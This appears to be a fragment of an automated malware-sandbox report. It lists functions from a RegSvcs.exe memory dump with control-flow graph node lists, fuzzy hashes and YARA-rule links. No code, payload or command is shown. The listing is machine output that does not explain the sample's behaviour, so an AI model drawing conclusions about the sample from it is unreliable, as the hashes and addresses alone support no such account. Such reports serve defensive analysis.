                                                                                • Instruction ID: c631f40c621150d88a2fceca350b8cfaafdc2907991749910a5d64c6bbbf7ec4
                                                                                • Opcode Fuzzy Hash: 0caccb789b2d9badf214842ad2f325dfd14d37918675a6e5fe85750039f50047
                                                                                • Instruction Fuzzy Hash: CF41E470D01248CBEB58CFAAD5446EDBBF2FF89300F24D52AD419AB258DB345A45CF54
                                                                                Function 061BDDFF Relevance: .1, Instructions: 95COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3b4d93280adb20df293acadda211a7bfadd43356d58031d0628e33668a55d6fb
                                                                                • Instruction ID: 17b7b963bf61ce3e63d3ab8c1de3bed9592865132a5513ab756962c77352580b
                                                                                • Opcode Fuzzy Hash: 3b4d93280adb20df293acadda211a7bfadd43356d58031d0628e33668a55d6fb
                                                                                • Instruction Fuzzy Hash: 2041C070E01248CBEB58DFAAD9446EDFBF2AF89300F24D12AC419BB259DB345946CF54
                                                                                Function 061B992C Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1051 61b992c 1052 61b99eb-61b99fc 1051->1052 1053 61b99fe 1052->1053 1054 61b9a03-61b9a0c 1052->1054 1053->1054 1056 61b97e3-61b9808 1054->1056 1057 61b9a12-61b9a25 1054->1057 1058 61b980a 1056->1058 1059 61b980f-61b9846 1056->1059 1060 61b9a2c-61b9a47 1057->1060 1061 61b9a27 1057->1061 1058->1059 1070 61b9848 1059->1070 1071 61b984d-61b987f 1059->1071 1062 61b9a49 1060->1062 1063 61b9a4e-61b9a62 1060->1063 1061->1060 1062->1063 1067 61b9a69-61b9a7f LdrInitializeThunk 1063->1067 1068 61b9a64 1063->1068 1069 61b9a81-61b9b7e 1067->1069 1068->1067 1073 61b9b80-61b9b85 1069->1073 1074 61b9b86-61b9b90 1069->1074 1070->1071 1076 61b98e3-61b98f6 1071->1076 1077 61b9881-61b98a6 1071->1077 1073->1074 1081 61b98f8 1076->1081 1082 61b98fd-61b9922 1076->1082 1078 61b98a8 1077->1078 1079 61b98ad-61b98db 1077->1079 1078->1079 1079->1076 1081->1082 1085 61b9931-61b9969 1082->1085 1086 61b9924-61b9925 1082->1086 1087 61b996b 1085->1087 1088 61b9970-61b99d1 call 61b9328 1085->1088 1086->1057 1087->1088 1094 61b99d8-61b99ea 1088->1094 1095 61b99d3 1088->1095 1094->1052 1095->1094
                                                                                APIs
                                                                                • LdrInitializeThunk.NTDLL(00000000), ref: 061B9A6E
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 9b8023f8e7deb3624ec76709a2206a46b9e3c13c20237c9cd084f7259fed7f6f
                                                                                • Instruction ID: 4f8b597be8afa7f57ff9149cada22ed944064b3fed79b6f75789c195b6e1b844
                                                                                • Opcode Fuzzy Hash: 9b8023f8e7deb3624ec76709a2206a46b9e3c13c20237c9cd084f7259fed7f6f
                                                                                • Instruction Fuzzy Hash: 13116A74E002088FEB44DBF8C884EEDBBB5FB89314F158965E948A7255D7309942CF60
                                                                                Function 00FDAEF0 Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1704 fdaef0-fdaef1 1705 fdaed5-fdaed8 1704->1705 1706 fdaef3-fdaef5 1704->1706 1707 fdaed9 1705->1707 1706->1707 1708 fdaef7-fdaef9 1706->1708 1711 fdaedf-fdaee3 1707->1711 1712 fdaedb-fdaedc 1707->1712 1709 fdaedd 1708->1709 1710 fdaefb-fdaf40 1708->1710 1713 fdaee9-fdaeea 1709->1713 1716 fdaf53-fdaf5e 1710->1716 1717 fdaf42-fdaf4d 1710->1717 1711->1713 1712->1709 1721 fdb02f 1716->1721 1722 fdaf64-fdafc1 1716->1722 1717->1716 1720 fdafd6-fdb028 1717->1720 1720->1721 1725 fdb035-fdb03b 1721->1725 1729 fdafca-fdafd3 1722->1729 1727 fdb03d-fdb051 1725->1727 1727->1725 1734 fdb053-fdb059 1727->1734 1734->1727 1735 fdb05b-fdb06b 1734->1735 1737 fdb072-fdb074 1735->1737 1738 fdb06d call fd7c88 1735->1738 1739 fdb085-fdb093 1737->1739 1740 fdb076-fdb083 1737->1740 1738->1737 1746 fdb095-fdb09f 1739->1746 1747 fdb0a1 1739->1747 1745 fdb0a3-fdb0a6 1740->1745 1746->1745 1747->1745
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 3
                                                                                • API String ID: 0-1842515611
                                                                                • Opcode ID: bbe85733f363240d4539b6324a4dcb087c30f0eef2a378df9a367aa9aa1b2c19
                                                                                • Instruction ID: 70eaf8ab296afd32cb55e88cf79c7bfc68fee8822a027fa430df1c978f0ce778
                                                                                • Opcode Fuzzy Hash: bbe85733f363240d4539b6324a4dcb087c30f0eef2a378df9a367aa9aa1b2c19
                                                                                • Instruction Fuzzy Hash: 62410535B00204CFDB059F69D8586AE7BF3AFC8720F18846AE51AD7391DE358D02DB95
                                                                                Function 00FDE007 Relevance: .7, Instructions: 655COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a3158527538493acd8d1764a11444c6b94294a8dbd16e128cb75b42a0a1f2d43
                                                                                • Instruction ID: 0c37db68072597aa862b2a1bad5ba28c48de609077f3fb80f73dd22a09daf7a9
                                                                                • Opcode Fuzzy Hash: a3158527538493acd8d1764a11444c6b94294a8dbd16e128cb75b42a0a1f2d43
                                                                                • Instruction Fuzzy Hash: D912A6348A17538FE3546F38EAAD52EBA65FF1F323744EC00F94F81855DB7041A88A66
                                                                                Function 00FDE018 Relevance: .6, Instructions: 647COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2530 fde018-fde022 2531 fde029-fde0a7 call fde8e8 call fdf71f 2530->2531 2532 fde024 2530->2532 2859 fde0a8 call 61b0b30 2531->2859 2860 fde0a8 call 61b0b20 2531->2860 2532->2531 2551 fde0ae 2861 fde0af call 61b178f 2551->2861 2862 fde0af call 61b17a0 2551->2862 2552 fde0b5 2863 fde0b6 call 61b1e70 2552->2863 2864 fde0b6 call 61b1e80 2552->2864 2553 fde0bc 2865 fde0bd call 61b295a 2553->2865 2866 fde0bd call 61b2968 2553->2866 2554 fde0c3-fde0df 2852 fde0e0 call 61bddff 2554->2852 2853 fde0e0 call 61bddf1 2554->2853 2854 fde0e0 call 61bde00 2554->2854 2559 fde0e6-fde618 2855 fde619 call 61bfc68 2559->2855 2856 fde619 call 61bfc5e 2559->2856 2750 fde61f-fde8db 2851 fde8e2-fde8e5 2750->2851 2852->2559 2853->2559 2854->2559 2855->2750 2856->2750 2859->2551 2860->2551 2861->2552 2862->2552 2863->2553 2864->2553 2865->2554 2866->2554
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3b4b71983ddc30fe3fab71d58ca11b68897bcbc5932a0081322758c0c96c22c0
                                                                                • Instruction ID: 43d6892f5caa75d25d9b19c9a134e42e0eca22442f231605dc142c42c857fb86
                                                                                • Opcode Fuzzy Hash: 3b4b71983ddc30fe3fab71d58ca11b68897bcbc5932a0081322758c0c96c22c0
                                                                                • Instruction Fuzzy Hash: 4F12A7348A17538FE3542F38EAAD53ABA65FF1F323744EC00F94F81855DB7041A88A66
                                                                                Function 00FD0C8F Relevance: .5, Instructions: 545COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2867 fd0c8f-fd0cc0 2869 fd0cc7-fd0cdd call fd0780 2867->2869 2870 fd0cc2 2867->2870 2873 fd0ce2 2869->2873 2870->2869 2874 fd0cee-fd104e call fd0780 * 13 2873->2874 2948 fd1056-fd108f call fd27f0 call fd3cc0 2874->2948 3072 fd1092 call fd43dd 2948->3072 3073 fd1092 call fd440b 2948->3073 3074 fd1092 call fd4285 2948->3074 3075 fd1092 call fd41a0 2948->3075 2952 fd1098-fd10c2 2955 fd10cb-fd10ce call fd5370 2952->2955 2956 fd10d4-fd10fe 2955->2956 2959 fd1107-fd110a call fdc147 2956->2959 2960 fd1110-fd113a 2959->2960 2963 fd1143-fd1146 call fdc468 2960->2963 2964 fd114c-fd1176 2963->2964 2967 fd117f-fd1182 call fdc738 2964->2967 2968 fd1188-fd11b2 2967->2968 2971 fd11bb-fd11be call fdca08 2968->2971 2972 fd11c4-fd11f7 2971->2972 2975 fd1203-fd1209 call fdccd8 2972->2975 2976 fd120f-fd124b 2975->2976 2979 fd1257-fd125d call fdcfa9 2976->2979 2980 fd1263-fd129f 2979->2980 2983 fd12ab-fd12b1 call fdd278 2980->2983 2984 fd12b7-fd13d2 2983->2984 2997 fd13de-fd13f0 call fd5370 2984->2997 2998 fd13f6-fd145c 2997->2998 3003 fd1467-fd1473 call fdd548 2998->3003 3004 fd1479-fd1485 3003->3004 3005 fd1490-fd149c call fdd548 3004->3005 3006 fd14a2-fd14ae 3005->3006 3007 fd14b9-fd14c5 call fdd548 3006->3007 3008 fd14cb-fd14d7 3007->3008 3009 fd14e2-fd14ee call fdd548 3008->3009 3010 fd14f4-fd1500 3009->3010 3011 fd150b-fd1517 call fdd548 3010->3011 3012 fd151d-fd1529 3011->3012 3013 fd1534-fd153a 3012->3013 3069 fd1540 call fdd548 3013->3069 3070 fd1540 call fdd6d4 3013->3070 3014 fd1546-fd1552 3015 fd155d-fd1569 call fdd548 3014->3015 3016 fd156f-fd158c 3015->3016 3018 fd1597-fd15a3 call fdd548 3016->3018 3019 fd15a9-fd15b5 3018->3019 3020 fd15c0-fd15cc call fdd548 3019->3020 3021 fd15d2-fd15de 3020->3021 3022 fd15e9-fd15f5 call fdd548 3021->3022 3023 fd15fb-fd1607 3022->3023 3024 fd1612-fd161e call fdd548 3023->3024 3025 fd1624-fd1630 3024->3025 3026 fd163b-fd1647 call fdd548 3025->3026 3027 fd164d-fd1659 3026->3027 3028 fd1664-fd1670 call fdd548 3027->3028 3029 fd1676-fd1682 3028->3029 3030 fd168d-fd1699 call fdd548 3029->3030 3031 fd169f-fd16ab 3030->3031 3032 fd16b6-fd16c2 call fdd548 3031->3032 3033 fd16c8-fd16d4 3032->3033 3034 fd16df-fd16eb call fdd548 3033->3034 3035 fd16f1-fd17aa 3034->3035 3069->3014 3070->3014 3072->2952 3073->2952 3074->2952 3075->2952
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 166d7284d74c6325fdbfb34e97b0ac54cd499bb3958c6de205d00a03c03abc84
                                                                                • Instruction ID: aa49526e18649b5e4d2971689c7be137b1dfec2957cabfda7fe95758e420316a
                                                                                • Opcode Fuzzy Hash: 166d7284d74c6325fdbfb34e97b0ac54cd499bb3958c6de205d00a03c03abc84
                                                                                • Instruction Fuzzy Hash: 9852D47590021ACFDB54EF68E994B9DBBB2FF49300F1085A9D509AB359DB346E81CF80
                                                                                Function 00FD0CA0 Relevance: .5, Instructions: 539COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 3077 fd0ca0-fd0cc0 3078 fd0cc7-fd108f call fd0780 * 14 call fd27f0 call fd3cc0 3077->3078 3079 fd0cc2 3077->3079 3275 fd1092 call fd43dd 3078->3275 3276 fd1092 call fd440b 3078->3276 3277 fd1092 call fd4285 3078->3277 3278 fd1092 call fd41a0 3078->3278 3079->3078 3161 fd1098-fd153a call fd5370 call fdc147 call fdc468 call fdc738 call fdca08 call fdccd8 call fdcfa9 call fdd278 call fd5370 call fdd548 * 5 3272 fd1540 call fdd548 3161->3272 3273 fd1540 call fdd6d4 3161->3273 3223 fd1546-fd16eb call fdd548 * 10 3244 fd16f1-fd17aa 3223->3244 3272->3223 3273->3223 3275->3161 3276->3161 3277->3161 3278->3161
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 30b9df82548b242acf3affb2434b82d558782307df3cb4056ec4320fa5ed40da
                                                                                • Instruction ID: 1ac003a0e24ab8ef08f634fa3a45396a39cb949d2a310ba50ef3b1e48c86e335
                                                                                • Opcode Fuzzy Hash: 30b9df82548b242acf3affb2434b82d558782307df3cb4056ec4320fa5ed40da
                                                                                • Instruction Fuzzy Hash: 0052D57590021ACFDB54EF68E995B9DBBB2FF48300F1085A9D509AB359DB346E81CF80
                                                                                Function 00FD76F1 Relevance: .5, Instructions: 455COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 3545 fd76f1-fd76f2 3546 fd76f8-fd7725 3545->3546 3547 fd76f4-fd76f6 3545->3547 3548 fd772b-fd774e 3546->3548 3549 fd7b54-fd7b58 3546->3549 3547->3546 3558 fd77fc-fd7800 3548->3558 3559 fd7754-fd7761 3548->3559 3550 fd7b5a-fd7b6e 3549->3550 3551 fd7b71-fd7b7f 3549->3551 3555 fd7b81-fd7b96 3551->3555 3556 fd7bf0-fd7c05 3551->3556 3565 fd7b9d-fd7baa 3555->3565 3566 fd7b98-fd7b9b 3555->3566 3567 fd7c0c-fd7c19 3556->3567 3568 fd7c07-fd7c0a 3556->3568 3562 fd7848-fd7851 3558->3562 3563 fd7802-fd7810 3558->3563 3571 fd7770 3559->3571 3572 fd7763-fd776e 3559->3572 3569 fd7c67 3562->3569 3570 fd7857-fd7861 3562->3570 3563->3562 3583 fd7812-fd782d 3563->3583 3573 fd7bac-fd7bed 3565->3573 3566->3573 3574 fd7c1b-fd7c56 3567->3574 3568->3574 3577 fd7c6c-fd7c7a 3569->3577 3570->3549 3575 fd7867-fd7870 3570->3575 3578 fd7772-fd7774 3571->3578 3572->3578 3619 fd7c5d-fd7c64 3574->3619 3581 fd787f-fd788b 3575->3581 3582 fd7872-fd7877 3575->3582 3593 fd7c7c-fd7c7e 3577->3593 3594 fd7c80-fd7c85 3577->3594 3578->3558 3585 fd777a-fd77dc 3578->3585 3581->3577 3588 fd7891-fd7897 3581->3588 3582->3581 3603 fd782f-fd7839 3583->3603 3604 fd783b 3583->3604 3631 fd77de 3585->3631 3632 fd77e2-fd77f9 3585->3632 3590 fd789d-fd78ad 3588->3590 3591 fd7b3e-fd7b42 3588->3591 3601 fd78af-fd78bf 3590->3601 3602 fd78c1-fd78c3 3590->3602 3591->3569 3596 fd7b48-fd7b4e 3591->3596 3593->3594 3596->3549 3596->3575 3608 fd78c6-fd78cc 3601->3608 3602->3608 3609 fd783d-fd783f 3603->3609 3604->3609 3608->3591 3614 fd78d2-fd78e1 3608->3614 3609->3562 3615 fd7841 3609->3615 3617 fd798f-fd79ba call fd7538 * 2 3614->3617 3618 fd78e7 3614->3618 3615->3562 3635 fd7aa4-fd7abe 3617->3635 3636 fd79c0-fd79c4 3617->3636 3621 fd78ea-fd78fb 3618->3621 3621->3577 3624 fd7901-fd7913 3621->3624 3624->3577 3627 fd7919-fd7931 3624->3627 3689 fd7933 call fd80c9 3627->3689 3690 fd7933 call fd80d8 3627->3690 3630 fd7939-fd7949 3630->3591 3634 fd794f-fd7952 3630->3634 3631->3632 3632->3558 3637 fd795c-fd795f 3634->3637 3638 fd7954-fd795a 3634->3638 3635->3549 3656 fd7ac4-fd7ac8 3635->3656 3636->3591 3641 fd79ca-fd79ce 3636->3641 3637->3569 3639 fd7965-fd7968 3637->3639 3638->3637 3638->3639 3642 fd796a-fd796e 3639->3642 3643 fd7970-fd7973 3639->3643 3645 fd79f6-fd79fc 3641->3645 3646 fd79d0-fd79dd 3641->3646 3642->3643 3647 fd7979-fd797d 3642->3647 3643->3569 3643->3647 3648 fd79fe-fd7a02 3645->3648 3649 fd7a37-fd7a3d 3645->3649 3657 fd79ec 3646->3657 3658 fd79df-fd79ea 3646->3658 3647->3569 3651 fd7983-fd7989 3647->3651 3648->3649 3652 fd7a04-fd7a0d 3648->3652 3653 fd7a3f-fd7a43 3649->3653 3654 fd7a49-fd7a4f 3649->3654 3651->3617 3651->3621 3661 fd7a1c-fd7a32 3652->3661 3662 fd7a0f-fd7a14 3652->3662 3653->3619 3653->3654 3659 fd7a5b-fd7a5d 3654->3659 3660 fd7a51-fd7a55 3654->3660 3663 fd7aca-fd7ad4 call fd63e0 3656->3663 3664 fd7b04-fd7b08 3656->3664 3667 fd79ee-fd79f0 3657->3667 3658->3667 3665 fd7a5f-fd7a68 3659->3665 3666 fd7a92-fd7a94 3659->3666 3660->3591 3660->3659 3661->3591 3662->3661 3663->3664 3677 fd7ad6-fd7aeb 3663->3677 3664->3619 3674 fd7b0e-fd7b12 3664->3674 3670 fd7a6a-fd7a6f 3665->3670 3671 fd7a77-fd7a8d 3665->3671 3666->3591 3672 fd7a9a-fd7aa1 3666->3672 3667->3591 3667->3645 3670->3671 3671->3591 3674->3619 3675 fd7b18-fd7b25 3674->3675 3680 fd7b34 3675->3680 3681 fd7b27-fd7b32 3675->3681 3677->3664 3686 fd7aed-fd7b02 3677->3686 3683 fd7b36-fd7b38 3680->3683 3681->3683 3683->3591 3683->3619 3686->3549 3686->3664 3689->3630 3690->3630
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f2ae8518b4afcc45a8cd8dea437cb4715913aa1063f03ad3b8bb56d2487f8b8c
                                                                                • Instruction ID: 48914ec6445b5d3950a671f53068d880a63b23439751a99b9f313f85d6c8fa29
                                                                                • Opcode Fuzzy Hash: f2ae8518b4afcc45a8cd8dea437cb4715913aa1063f03ad3b8bb56d2487f8b8c
                                                                                • Instruction Fuzzy Hash: 04124930A04249DFCB15EF69C894A9EBBF2FF88314F18855AE4499B361E730ED41DB90
                                                                                Function 00FD5F38 Relevance: .3, Instructions: 267COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 4060 fd5f38-fd5f5a 4061 fd5f5c-fd5f60 4060->4061 4062 fd5f70-fd5f7b 4060->4062 4063 fd5f88-fd5f8f 4061->4063 4064 fd5f62-fd5f6e 4061->4064 4065 fd5f81-fd5f83 4062->4065 4066 fd6023-fd604f 4062->4066 4068 fd5faf-fd5fb8 4063->4068 4069 fd5f91-fd5f98 4063->4069 4064->4062 4064->4063 4067 fd601b-fd6020 4065->4067 4073 fd6056-fd60ae 4066->4073 4145 fd5fba call fd5f29 4068->4145 4146 fd5fba call fd5f38 4068->4146 4069->4068 4070 fd5f9a-fd5fa5 4069->4070 4072 fd5fab-fd5fad 4070->4072 4070->4073 4072->4067 4092 fd60bd-fd60cf 4073->4092 4093 fd60b0-fd60b6 4073->4093 4074 fd5fc0-fd5fc2 4075 fd5fca-fd5fd2 4074->4075 4076 fd5fc4-fd5fc8 4074->4076 4080 fd5fd4-fd5fd9 4075->4080 4081 fd5fe1-fd5fe3 4075->4081 4076->4075 4079 fd5fe5-fd6004 call fd69a0 4076->4079 4086 fd6019 4079->4086 4087 fd6006-fd600f 4079->4087 4080->4081 4081->4067 4086->4067 4140 fd6011 call fdafad 4087->4140 4141 fd6011 call fdaef0 4087->4141 4089 fd6017 4089->4067 4095 fd60d5-fd60d9 4092->4095 4096 fd6163-fd6165 4092->4096 4093->4092 4097 fd60e9-fd60f6 4095->4097 4098 fd60db-fd60e7 4095->4098 4142 fd6167 call fd62f0 4096->4142 4143 fd6167 call fd6300 4096->4143 4106 fd60f8-fd6102 4097->4106 4098->4106 4099 fd616d-fd6173 4100 fd617f-fd6186 4099->4100 4101 fd6175-fd617b 4099->4101 4104 fd617d 4101->4104 4105 fd61e1-fd6240 4101->4105 4104->4100 4119 fd6247-fd6262 4105->4119 4109 fd612f-fd6133 4106->4109 4110 fd6104-fd6113 4106->4110 4111 fd613f-fd6143 4109->4111 4112 fd6135-fd613b 4109->4112 4121 fd6115-fd611c 4110->4121 4122 fd6123-fd612d 4110->4122 4111->4100 4116 fd6145-fd6149 4111->4116 4114 fd613d 4112->4114 4115 fd6189-fd61da 4112->4115 4114->4100 4115->4105 4118 fd614f-fd6161 4116->4118 4116->4119 4118->4100 4121->4122 4122->4109 4140->4089 4141->4089 4142->4099 4143->4099 4145->4074 4146->4074
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d88eef3ea6d87323207568660df9ac00c9bb5a852667c46a63a3c6ed5fded677
                                                                                • Instruction ID: 29317330988a69705a80e2e2e8c81e3bb8642c94aed57a855390448e4439626d
                                                                                • Opcode Fuzzy Hash: d88eef3ea6d87323207568660df9ac00c9bb5a852667c46a63a3c6ed5fded677
                                                                                • Instruction Fuzzy Hash: E691C131B04205CFDB159F68C854B6E7BE3AF89714F18896AE406CB396DB39CC02DB91
                                                                                Function 00FD6498 Relevance: .2, Instructions: 234COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: bfc9a177b7876fd78c3b21b2cab4d02f80310f45902075c0d84437be32853fce
                                                                                • Instruction ID: 51d2fd0f8accc561ad5b0b3976dd554c5ed3dab54dfcf19beecc936de639dd30
                                                                                • Opcode Fuzzy Hash: bfc9a177b7876fd78c3b21b2cab4d02f80310f45902075c0d84437be32853fce
                                                                                • Instruction Fuzzy Hash: 6C816C35E00505CFCB14CFA9D884A6EBBB3BF89714B29816AD405EB365DB31EC41EB91
                                                                                Function 00FD80D8 Relevance: .2, Instructions: 201COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a40e83df37e75bd2889b87f41338ad1d034301629325567cbc7b71e2b9199361
                                                                                • Instruction ID: ff4d87c656e63463e46df418a747dc6e63e97dff0964659cc55b723abc6867b6
                                                                                • Opcode Fuzzy Hash: a40e83df37e75bd2889b87f41338ad1d034301629325567cbc7b71e2b9199361
                                                                                • Instruction Fuzzy Hash: E5715C34B406058FCB15DF69C884A6E7BE6BF99391B1944AAE802DB371DF70DC42DB50
                                                                                Function 00FDF71F Relevance: .2, Instructions: 156COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 69c0b8890df8df94f2d18875d752a9a40b0f2fc731215c38b6814912ea7ba8f1
                                                                                • Instruction ID: c001c7413b95a88d8289eda6f7e205aec1a3b6478bf968643ad1505a014411a4
                                                                                • Opcode Fuzzy Hash: 69c0b8890df8df94f2d18875d752a9a40b0f2fc731215c38b6814912ea7ba8f1
                                                                                • Instruction Fuzzy Hash: 0D611E74D01219DFEB14DFA4D954BADBBB2FF88304F20812AD80AAB394DB355A46CF40
                                                                                Function 00FD9C30 Relevance: .2, Instructions: 152COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7a3db1ecfc69ea6df20bab298cdbb2cf9a68da0f2c5c11657961bd9b41254f73
                                                                                • Instruction ID: b368c98050041b97803bb7185c5e23f85d70f69dcc2a7079cd8f646bff4b9cdb
                                                                                • Opcode Fuzzy Hash: 7a3db1ecfc69ea6df20bab298cdbb2cf9a68da0f2c5c11657961bd9b41254f73
                                                                                • Instruction Fuzzy Hash: 65517035B042059FDB01EBA9C844B6ABBE7EF88350F18846BE949CB355DBB1DC01D7A1
                                                                                Function 00FDD548 Relevance: .1, Instructions: 142COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a33e1d9e37a3aaf45a864b097563af2f0df7302c2edf6f9a247ca17da1d64155
                                                                                • Instruction ID: 9348a643f5fcdb4d20e2966e1cac180a8986091f51c04e2f1a4c3e6fb2a278ee
                                                                                • Opcode Fuzzy Hash: a33e1d9e37a3aaf45a864b097563af2f0df7302c2edf6f9a247ca17da1d64155
                                                                                • Instruction Fuzzy Hash: 73519674E01208DFDB54DFA9D98499DBBF2FF89300F248169E409AB365DB319905CF50
                                                                                Function 00FD41A0 Relevance: .1, Instructions: 134COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4a379fe048a8f25aeacbd073cb5017cd5970a3ed6368d807f8c51b25607ca286
                                                                                • Instruction ID: f5ff13689b0f7f8d5ea9c95bfe5559a602bae33e23e9d36862b7aefc97ba5ef2
                                                                                • Opcode Fuzzy Hash: 4a379fe048a8f25aeacbd073cb5017cd5970a3ed6368d807f8c51b25607ca286
                                                                                • Instruction Fuzzy Hash: 1F51E575E01208CFCB08DFA9D99489DBBF2FF8D300B248469E809AB325DB35A841CF50
                                                                                Function 00FDA303 Relevance: .1, Instructions: 124COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
